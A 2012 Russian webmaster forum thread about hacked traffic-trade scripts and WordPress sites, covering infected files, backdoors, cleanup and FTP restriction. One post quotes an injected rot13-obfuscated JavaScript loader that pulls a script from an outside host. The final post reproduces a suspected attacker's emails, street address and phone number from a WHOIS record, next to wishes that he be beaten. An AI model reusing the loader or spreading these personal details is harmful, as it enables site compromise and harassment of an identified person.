Опытный плюсополучатель
С нами с 09.06.05
Сообщения: 8305
Рейтинг: 186
|
Добавлено: 13/02/12 в 06:18 |
X-dream, в этом файле прописываешь, с каких IP разрешено к тебе на сайт по FTP ходить. У меня, например, на хостинге прописано разрешение ходить по FTP только с моего домашнего компа и с наладонника. Так что, даже если у меня все пароли от FTP попиздят, то всё равно обломятся зайти.
У меня этот файл лежит в корне хостинга и имеет довольно простенький формат - разрешать заходить по FTP только мне:
Код: | <Limit ALL>
Allow from 123.112.221.223
Allow from 111.222.23.12
Deny from all
</Limit>
|
Дока по формату - здесь: http://peterhost.ru/wiki/.ftpaccess/
|
|
|
|
пьяный мастер
С нами с 06.09.05
Сообщения: 11947
Рейтинг: 5837
|
Добавлено: 13/02/12 в 18:10 |
Хмм... Саппорт у TrafficRevenue.net оказался вполне вменяемым.
Я с них хочу компенсацию 1200 получить(товарищ говорит что я дурак и надо было сразу 100к предьявлять им) но потратил я 1200 уже и пусть все будет честно .
Сказали что за всех своих 25000 адвертов не могут отвечать, но именно этого хакера забанят, дадут мне его данные + мыло пейпала если оно есть, а то что он успел на моих сайтах заработать заплатят мне .....слабо верится что заплатят... да и похрен деньги....хочу наказать гандона, хоть както.
|
|
|
|
С нами с 09.05.08
Сообщения: 225
Рейтинг: 155
|
Добавлено: 14/02/12 в 00:44 |
через TP могли ломануть, проверь файл tpupdater.php должен быть около 15кб, если меньше в два раза, значит он.
|
|
|
|
пьяный мастер
С нами с 06.09.05
Сообщения: 11947
Рейтинг: 5837
|
Добавлено: 14/02/12 в 06:58 |
remote_updater.php
filter.php
updater.php
tpupdater.php - 5kb
tools.php
vtop.php
вот эти все хакнуты. да и много еще файлов и пхп и хтмл
хм... из последних скриптов ставил FREE TP Version 1.0.8 build 43
|
|
|
|
С нами с 09.05.08
Сообщения: 225
Рейтинг: 155
|
Добавлено: 14/02/12 в 13:32 |
это один пидор с Киргизии ломает, слушай, если тебе дадут его данные, скинь мне их в личку плиз. и пиши kildoozer@scriptpulse.com, он знает что делать
|
|
|
|
пьяный мастер
С нами с 06.09.05
Сообщения: 11947
Рейтинг: 5837
|
Добавлено: 14/02/12 в 15:24 |
eVan писал: | это один пидор с Киргизии ломает |
хмм жду ответа от трафревеню...
а почему думаеш что один и тот же чел? на прошлые взломы тп ставили теже коды?
|
|
|
|
С нами с 09.05.08
Сообщения: 225
Рейтинг: 155
|
Добавлено: 14/02/12 в 15:37 |
да мы уже с ним месяца 3 точно бодаемся, тут вот топек на эту тему есть http://forum.scriptpulse.com/index.php/topic,1455.0.html
если есть возможность, то можно у хостеров логи посмотреть, с какого ip файлы менялись, у нас всегда с киргизского, и сам суппорт TP его уже хорошо знает, только никак адрес вычислить не может.
|
|
|
|
пьяный мастер
С нами с 06.09.05
Сообщения: 11947
Рейтинг: 5837
|
Добавлено: 14/02/12 в 16:00 |
гы. пока саппорт дримхоста отвечает на тикет уже восьмой час мне почистили и уже перенесли все сайты на дедик осталось только днс сменить...
хз где дыра. от тп наверно придется временно отказатся.
|
|
|
|
С нами с 01.06.04
Сообщения: 595
Рейтинг: 135
|
Добавлено: 14/02/12 в 17:19 |
есть подозрение, что переезд на дедик не поможет, т.к. бэкдоры рассованы по файлам, которые тоже переедут, и начнется по новой
|
|
|
|
С нами с 08.04.11
Сообщения: 129
Рейтинг: 118
|
Добавлено: 15/02/12 в 12:13 |
Берем свежую версию с офф сайта(если конечно сам офф сайт не взломан) сравниваем все файлъй и чистимся.Бабло приятно зарабатъвать,а вот платить за security никто не хочет.Прикольно.
|
|
|
|
пьяный мастер
С нами с 06.09.05
Сообщения: 11947
Рейтинг: 5837
|
Добавлено: 17/02/12 в 07:48 |
eVan писал: | это один пидор с Киргизии ломает, слушай, если тебе дадут его данные, скинь мне их в личку плиз. и пиши kildoozer@scriptpulse.com, он знает что делать |
Есть данные этого васи. И адрес и номер телефона. И мыло пейпала. Наверно данные левые, но то что есть...
Скинул в ЛС
Надеюсь его жестоко отпиздят и посадят.
зы - сюда запостить или не надо?
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 17/02/12 в 08:32 |
Ха парни читаю тему и вижу ту же ситуацию что была год назад у меня и у других в топлистах. кому интересно найдите тему про взлом гб топов. да этот чертыла с киргизии его айпи я в тех темах светил. переезд не помогает. я все заново восстанавливал и сиджи и топы. тк код был везде и бекап восстанавливать бесполезно.
|
|
|
|
пьяный мастер
С нами с 06.09.05
Сообщения: 11947
Рейтинг: 5837
|
Добавлено: 17/02/12 в 09:42 |
CrazyMen: это пиздец )) реально все вернулось... сцука.
|
|
|
|
пьяный мастер
С нами с 06.09.05
Сообщения: 11947
Рейтинг: 5837
|
Добавлено: 17/02/12 в 09:46 |
TP которые на дедике не пострадали причем не обновлял их уже больше года, но там по ип закрыто и фаервол стоит.
а все что на дримхосте
|
|
|
|
пьяный мастер
С нами с 06.09.05
Сообщения: 11947
Рейтинг: 5837
|
Добавлено: 17/02/12 в 09:53 |
если все TP снесу (через ssh всю папку) то дыра исчезнет?
|
|
|
|
С нами с 08.04.11
Сообщения: 129
Рейтинг: 118
|
Добавлено: 17/02/12 в 10:44 |
Цитата: | если все TP снесу (через ssh всю папку) то дыра исчезнет? |
Ага и есчо ТР исчезнет.
Почекай как я тебе вверху написал и вижу что по ИП уже закръл.
|
|
|
|
пьяный мастер
С нами с 06.09.05
Сообщения: 11947
Рейтинг: 5837
|
Добавлено: 17/02/12 в 10:56 |
pexli писал: | Ага и есчо ТР исчезнет |
ну это не критично, два, три сайта могут потерпеть без трейда. уже снес. сейчас wp обновляю, вроде помогает...
главное чтоб гугл не заметил и что дыра не в wp я надеюсь, а с секьюрити разберусь...
|
|
|
|
С нами с 08.04.11
Сообщения: 129
Рейтинг: 118
|
Добавлено: 17/02/12 в 11:25 |
WP софт х***й.
Лишних плагинов не ставить.
Админку по .htaccess закръть для посторонних
Upload и правка файлов через админку запретить.Все через фтп.
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 17/02/12 в 15:01 |
Я три раза все сносил и ставил заново. не помогло. код был прописан даже в тумбах я нашел только один выход от сюда - начать все с нуля. восстановил дизы дески пикчи нарезал снова... я тогда думал что брошу все после того как третий раз все восстанавливал, но потом все же нашел в себе силы восстановить пусть не все но хотя бы часть
|
|
|
|
С нами с 29.09.04
Сообщения: 329
Рейтинг: 120
|
Добавлено: 17/02/12 в 15:31 |
X-dream: а можешь сделать список плагинов и тем которые есть на блогах?
в самом вп редко баги серьезные бывают
|
|
|
|
ябудубудай
С нами с 20.02.07
Сообщения: 722
Рейтинг: 1038
|
Добавлено: 17/02/12 в 16:28 |
X-dream у меня на ТР скрипте старой версии (того года), показывались поп ап окна, какой то рекламы и только, для американ айпи, в следствии чего траф подсел в раза два, но исправил ситуацию путем обновления до последний версии скрипта, а так же заказывал сторонюю поддержку, через шелл, на предмет выявления вирусов, и т.п. у софт кома! Вот так.. : )
|
|
|
|
местный
С нами с 10.08.03
Сообщения: 1578
Рейтинг: 2362
|
Добавлено: 17/02/12 в 17:34 |
Сейчас переношу с фрихостов купленные сайты так тоже обнаружил похожий код на сайтах
Код: [развернуть] | <script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg ynathntr=\"wninfpevcg\" fep=\"uggc://jjj.nyynop.pbz/vaqrk.cuc?ers=pbqr\"></fpevcg>"));</script> |
а вот куда ведет он после расшифровки :
Код: [развернуть] | <script src="http://www.allabc.com/index.php?ref=code" language="javascript"/> |
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 17/02/12 в 18:36 |
Парни вы ищите как он вас проломил, через что желательно. если сломали вас значит сломали и других. Отпишите овнерам скриптов что произшло и как быстрее это исправить иначе просто пистец настанет массовый. Если у кого ip хацкера есть скиньте плиз сравню он не он
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
7
|
|
|
пьяный мастер
С нами с 06.09.05
Сообщения: 11947
Рейтинг: 5837
|
Добавлено: 17/02/12 в 18:37 |
Блять! Это нахуй эпидемия...
хуйня война...что не убивает - делает сильнее!
|
|
|
|
пьяный мастер
С нами с 06.09.05
Сообщения: 11947
Рейтинг: 5837
|
Добавлено: 17/02/12 в 18:48 |
Цитата: | Цитата: |
Hello.
Let me follow you up on this.
Here are account details:
Email: webex.post@gmail.com
PayPal email: nexxxen@gmail.com
What we have done:
1. The account "inj" has been banned.
2. All payments are blocked.
3. No ads for account "inj" will be displayed
I am also exchanging informations with another affected webmaster.
His email is kildoozer@gmail.com and his servers were hacked as well.
You may want to contact him to cooperate(he allowed me to provide you
his email).
Finally, by googling his email, I might have been able to get
additional details of the attacker:
http://xml.ssdsandbox.net/dnslookup-dnsdb/xtds.in.
Best regards,
Tomasz Klekot
TrafficRevenue
| |
Цитата: |
Domain ID:D4085859-AFIN
Domain Name:XTDS.IN
Created On:11-Mar-2010 11:58:54 UTC
Last Updated On:07-Feb-2012 21:15:13 UTC
Expiration Date:11-Mar-2013 11:58:54 UTC
Sponsoring Registrar:Directi Web Services Pvt. Ltd. (R118-AFIN)
Status:CLIENT TRANSFER PROHIBITED
Registrant ID:TS_11767501
Registrant Name:George Weber
Registrant Organization:N/A
Registrant Street1:Chuyskaya, 213
Registrant Street2:
Registrant Street3:
Registrant City:Osh
Registrant State/Province:Osh
Registrant Postal Code:720000
Registrant Country:KG
Registrant Phone:+996.502560888
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:webex.post@gmail.com
Admin ID:TS_11767501
Admin Name:George Weber
Admin Organization:N/A
Admin Street1:Chuyskaya, 213
Admin Street2:
Admin Street3:
Admin City:Osh
Admin State/Province:Osh
Admin Postal Code:720000
Admin Country:KG
Admin Phone:+996.502560888
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:webex.post@gmail.com
Tech ID:TS_11767501
Tech Name:George Weber
Tech Organization:N/A
Tech Street1:Chuyskaya, 213
Tech Street2:
Tech Street3:
Tech City:Osh
Tech State/Province:Osh
Tech Postal Code:720000
Tech Country:KG
Tech Phone:+996.502560888
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:webex.post@gmail.com
Name Server:GETNIC.MERCURY.ORDERBOX-DNS.COM
Name Server:GETNIC.VENUS.ORDERBOX-DNS.COM
Name Server:GETNIC.EARTH.ORDERBOX-DNS.COM
Name Server:GETNIC.MARS.ORDERBOX-DNS.COM
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC:Unsigned
|
|
|
|
|